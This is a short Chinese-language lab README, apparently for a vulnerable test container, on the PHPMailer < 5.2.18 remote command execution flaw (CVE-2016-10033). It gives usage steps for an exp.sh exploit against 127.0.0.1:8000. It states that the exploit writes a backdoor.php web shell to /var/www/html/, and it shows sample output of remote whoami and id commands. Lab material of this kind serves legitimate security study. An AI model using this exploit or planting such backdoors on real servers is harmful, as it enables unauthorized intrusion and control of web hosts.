Phpmailer

< 5.2.18 远程命令执行 (CVE-2016-10033)

exp使用方法:

$ ./exp.sh host:port

假设容器启动后访问的地址为:http://127.0.0.1:8000/

$ ./exp.sh 127.0.0.1:8000

执行完后耐心等待一会(比较慢,大概2分钟以内),就会向服务器中写入 backdoor.php 文件(写入的物理路径见exp.sh,默认写入到/var/www/html/目录下),然后就看到如下输出:

➜ ./exp.sh 127.0.0.1:8000
[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting 127.0.0.1:8000
[+] Target exploited, acessing shell at http://127.0.0.1:8000/backdoor.php
[+] Checking if the backdoor was created on target system
[+] Backdoor.php found on remote system
[+] Running whoami
www-data
RemoteShell> id
[+] Running id
uid=33(www-data) gid=33(www-data) groups=33(www-data)